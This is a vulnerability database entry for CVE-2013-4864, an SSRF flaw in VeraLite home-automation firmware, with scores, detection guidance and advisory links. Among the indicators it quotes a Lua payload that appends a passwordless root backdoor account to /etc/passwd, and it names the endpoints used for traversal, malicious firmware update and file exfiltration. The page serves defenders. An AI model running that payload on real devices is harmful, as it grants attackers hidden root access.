CVE-2013-4864
published 2020-01-28CVE-2013-4864: MiCasaVerde VeraLite with firmware 1.5.408 allows remote attackers to send HTTP requests to intranet servers via the url parameter to cgi-bin/cmh/proxy.sh…
PriorityP263critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
6.31%
92.7th percentile
MiCasaVerde VeraLite with firmware 1.5.408 allows remote attackers to send HTTP requests to intranet servers via the url parameter to cgi-bin/cmh/proxy.sh, related to a Server-Side Request Forgery (SSRF) issue.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| micasaverde | veralite_firmware | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandos.execute("echo 'backdoor%3a%3a0%3a0%3aBackdoor Root Account%3a/tmp%3a/bin/ash' %3e%3e /etc/passwd")↗
- →Detect SSRF exploitation attempts by monitoring HTTP GET requests to /cgi-bin/cmh/proxy.sh with a 'url' parameter pointing to internal or external hosts. ↗
- →Detect path traversal attempts via GET requests to /cgi-bin/cmh/get_file.sh with 'filename' parameter containing '../' sequences. ↗
- →Detect privilege escalation via firmware update endpoint by monitoring GET requests to /upgrade_step2.sh with a 'squashfs' parameter referencing a remote URL. ↗
- →Detect sensitive file exfiltration attempts via GET requests to /cgi-bin/cmh/backup.sh with 'external=1' parameter. ↗
- →Detect backdoor account creation via Lua RunLua payloads containing 'os.execute' with echo commands writing to /etc/passwd. ↗
- ·The path traversal via get_file.sh requires the target directory to exist first; it can be pre-created using store_file.sh, meaning exploitation is a two-step process. ↗
- ·The SSRF and other attacks can also be launched through the Internet-based control panel at cp.mios.com when authenticated as admin or guest, extending the attack surface beyond the LAN. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No writeups or analysis indexed.
http://packetstormsecurity.com/files/122654/MiCasaVerde-VeraLite-1.5.408-Traversal-Authorization-CSRF-Disclosure.htmlhttp://www.exploit-db.com/exploits/27286https://www3.trustwave.com/spiderlabs/advisories/TWSL2013-019.txthttp://packetstormsecurity.com/files/122654/MiCasaVerde-VeraLite-1.5.408-Traversal-Authorization-CSRF-Disclosure.htmlhttp://www.exploit-db.com/exploits/27286https://www3.trustwave.com/spiderlabs/advisories/TWSL2013-019.txt
2020-01-28
Published